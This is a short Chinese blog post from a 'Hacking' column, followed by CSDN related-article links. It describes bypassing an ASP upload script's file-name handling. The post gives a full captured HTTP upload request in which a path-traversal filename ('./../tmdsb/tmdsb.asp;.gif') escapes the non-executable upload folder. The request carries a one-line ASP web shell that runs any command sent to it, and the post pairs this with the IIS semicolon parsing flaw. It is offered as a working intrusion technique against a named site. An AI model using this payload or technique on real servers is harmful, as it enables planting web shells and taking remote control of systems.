不改文件名的情况下上传突破

最新推荐文章于 2024-07-17 11:08:00 发布
最新推荐文章于 2024-07-17 11:08:00 发布
阅读量629 收藏
点赞数
分类专栏: Hacking 文章标签: .net windows file iis asp cmd
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/god_7z1/article/details/6284079
版权

方法不错,首先就是不强制改上传文件名。还有就是上传目录没有执行的权限。

然后用这方法貌似就可以上传到上级可写目录了。

比如抓这是抓的上传数据包:

POST /upload/upfile.asp HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://www.tmdsb.com/upload/upload.asp
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=—————————7da290150c5e
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: www.tmdsb.com
Content-Length: 448
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSSCTCSCT=DJBKGKLBBIGNKJMBGOENNPAN
—————————–7da290150c5e
Content-Disposition: form-data; name=”act”
upload
—————————–7da290150c5e
Content-Disposition: form-data; name=”file1″; filename=”d:/www/tmdsb/web/tmdsb.asp;.gif”
Content-Type: text/plain
<%execute(request("cmd"))%>
—————————–7da290150c5e
Content-Disposition: form-data; name=”Submit”
up
—————————–7da290150c5e–
然后看关键是:

Content-Disposition: form-data; name=”file1″; filename=”d:/www/tmdsb/web/tmdsb.asp;.gif”

我首先呢。 filename他是如何判断 那个开始就是文件名呢?

他是判断filename里的最右边的一个”/”以后的就是文件名字了。

大家因该知道。 在windows下 “/” 和 “/” 是不分家的。

假设上传之后的目录为upload/

然后一个可以执行可以写的目录为 tmdsb/

那么我们只要构造

Content-Disposition: form-data; name=”file1″; filename=”d:/www/tmdsb/web/./../tmdsb/tmdsb.asp;.gif”

上传的文件就成功的传进去了 tmdsb/tmdsb.asp;.gif了。

当然还要配合IIS漏洞才行(在只能上传图片的情况下)要是直接能上传asp的话就

没所谓了。by www.sb-sb.cn

7禧
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
java中如何实现文件打包上传以及自动解压
rich1979的专栏
12-29 9865
我们在开发项目的时候,特别是B/S系统,经常会遇到要批量上传文件的需求,对此需求一般有如下几个解决方案(以B/S为例): 1. 在客户端提供文件上传接口,一次上传一个文件 2. 一次上传多个文件 3. 将需要上传的文件打包,一次上传到服务器,并自动解压到指定目录 1,2方法都有几个很明显的不足,用户工作量大,文件如果过大,在网络环境中,上传的效率低下,另外文件在不同的目录,是无法进行一次选择上传
文件上传的各种绕过方式
qq_59357741的博客
08-11 7866
常见的文件上传的各种漏洞
文件上传文件名可控绕过上传
2301_79299101的博客
11-08 171
2.与中间的漏洞配合使用 例如 iis6.0 上传 1.php;1.jpg apache 上传1.php.a 也能解析文件 a.asp;1.jpg 解析成 asp。1.上传文件,文件吗采用%00 截断,抓包解码例如 moon.php%00.php 截断后moon.php 或者使用/.前提:%00 截断 需要 gpc 关闭 抓包 解码 提交即可 截断文件名php 版本小于5.3.4。将文件名 1.php;.jpg 改成 iis6.0 可解析文件。1,文件上传时,文件名的可被客户端修改控制,会导致漏洞产生。
php上传突破,php遇上iis上传突破
weixin_33364945的博客
03-24 120
环境: php+window+iis局限: 文件上传黑名单机制,略显鸡肋//U-Mail demo ...if(isset($_POST['submit'])){$filename = $_POST['filename'];$filename = preg_replace("/[^\w]/i", "", $filename);$upfile = $_FILES['file']['name'];$u...
突破VirtualWall上传webshell
Coisini的博客
06-13 272
打开目标站点看了一下用的是易想商务网慧聪网风格V2.5 的商务建站系统! 随手看了一下,用NC提交注册一个用户名为woc.asp的用户名。系统会自动新建一个以用户名为命名的文件夹 然后来到相册管理,上传一个改后缀为JPG的ASP大马。本来以为秒了 尼玛的,不给力 给拦截了,百思不其解,心想可能这马加密不够,蛋疼的拖来一个合并图片的一句话 可还是给拦截了,于是抓包看了一下上传地址的URL htt...
修改html以前上传过的文件,html5大文件上传技术
weixin_42362146的博客
06-04 132
html5大文件上传技术引言普通html表单在上传几KB或几MB级别的文件基本无压力,但在上传上百MB甚至是GB级别大文件很无爱。而且一般服务器单个文件上传限制基本都在几MB之内。如何有效突破限制,上传大文件技术值得深入探讨。一般解决方案html5文件分割上传上传相关问题讨论一般解决方案一般解决方案粗劣总结主要由以下几种:FTP使用ftp一般能满足上传大文件需求,但是从用户角度来讲,ftp方式大众...
过滤php 突破上传,分享上传图片shell的绕过过滤的几种方法
weixin_42396180的博客
03-11 299
一般网站图片上传功能都对文件进行过滤,防止webshell写入。但不同的程序对过滤也不一样,如何突破过滤继续上传?本文总结了七种方法,可以突破!1、文件头+GIF89a法。(php)//这个很好理解,直接在php马最前面写入gif89a,然后上传dama.php2、使用edjpgcom工具向图片注入代码。(php)//edjpgcom修改,加入php一句话保存为dama.php3、cmd命令下co...
ViktorWkxStar#1231231#三、FCKeditor 突破上传1
07-25
上传限制上传限制的突破方式很多,主要还是抓包改扩展名,%00截断,添加文件头等文件名限制二次上传绕过文件名' . ' 修改为' _ 'FCK在上传了诸如shel
brup配置到简单的修改数据包.pdf
05-19
上传文件后,在Burp Suite中观察捕获的数据包,将文件名由sweet.gif修改为sweet.asp,然后使用"forward"功能将修改后的数据包发送出去,从而实现木马文件的上传。 此外,教程还提到了Burp Suite的一个高级应用,即...
PHP 文件上传全攻略
10-29
下面是对PHP文件上传的详细解析,包括表单设置、文件处理、错误检查、相关配置参数以及多文件上传突破内存限制的方法。 首先,为了允许用户上传文件,我们需要在HTML表单中设置正确的属性。`enctype="multipart/...
asp.net(C#)中上传大文件的几中常见应用方法
01-20
默认情况下,ASP.NET通过Web.Config配置文件中的`<httpRuntime>`元素限制了`maxRequestLength`属性,其默认值为2MB。要增加这个限制,可以修改Web.Config文件如下: ```xml ``` 这将允许上传最大4MB的文件...
码云上传本地文件夹,码云只能上传20个文件的突破方法
热门推荐
Mr_Duoduo的博客
07-23 1万+
码云官方地址:https://gitee.com/ 很多人不知道码云上传本地文件夹怎么操作,或者如何突破码云只能上传20个文件限制的问题,今天就来说说这事的方法吧。 简介: 码云是媲美GitHub的代码管理平台,个人拥有5GB的免费上长传空间,的确挺好使啦,而GitHub同样好用,只可惜真的叫一个——卡!5gb的免费空间对于个人来说还是够用了的,我们的一些经典代码放在自己的电脑上容易弄丢,...
文件上传限制绕过技巧
CHK的博客
09-03 6517
简介 文件上传漏洞是web安全中经常利用到的一种漏洞形式。一些web应用程序中允许上传图片,文本或者其他资源到指定的位置,文件上传漏洞就是利用这些可以上传的地方将恶意代码植入到服务器中,再通过url去访问以执行代码。但在一些安全性较高的web应用中,往往会有各种上传限制和过滤,导致我们无法上传特定的文件。本文将就此展开讨论,通过本文的学习你将了解到Web应用中文件上传的处理和验证发送流程,以及我...
.NET全栈】ASP.NET开发Web应用——站点导航技术
JosieBook
07-15 832
大型的企业级网站,可能有成百上千个网页,导航变得十分重要。好的导航系统能够方便用户在多个页面间来回浏览,增加了应用程序的可交互性。ASP.NET提供了内置的导航技术,让开发人员创建站点导航变得轻松。ASP.NET中的站点地图用于导航的高级服务器控件TreeView菜单和导航服务器控件Menu站点地图是一个名为Web.sitemap的XML文件。
Windows 上开发.NET MAUI 应用_1.安装开发环境
huaqianzkh的专栏
07-16 676
开发跨平台的本机 .NET Multi-platform App UI (.NET MAUI) 应用需要 Visual Studio 2022 17.8 或更高版本,或者具有 .NET MAUI 扩展的最新 Visual Studio Code。如果是这样,请执行该操作,然后像往常一样启动 Visual Studio。例如,如果以前安装了 Visual Studio Community 2022,并且具有该版本的更新,则 Visual Studio 安装程序中将显示“有可用更新”消息。
C#,.NET常见算法
最新发布
房东的猫的博客
07-17 412
【代码】C#,.NET常见算法。
MultipartFile不落地直接修改文件名
01-11
如果你想在不将文件保存到磁盘上的情况下修改文件名,可以使用MultipartFile的getOriginalFilename()方法获取原始文件名,然后根据需要修改文件名。 以下是一个示例代码,演示了如何使用MultipartFile修改文件名: ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值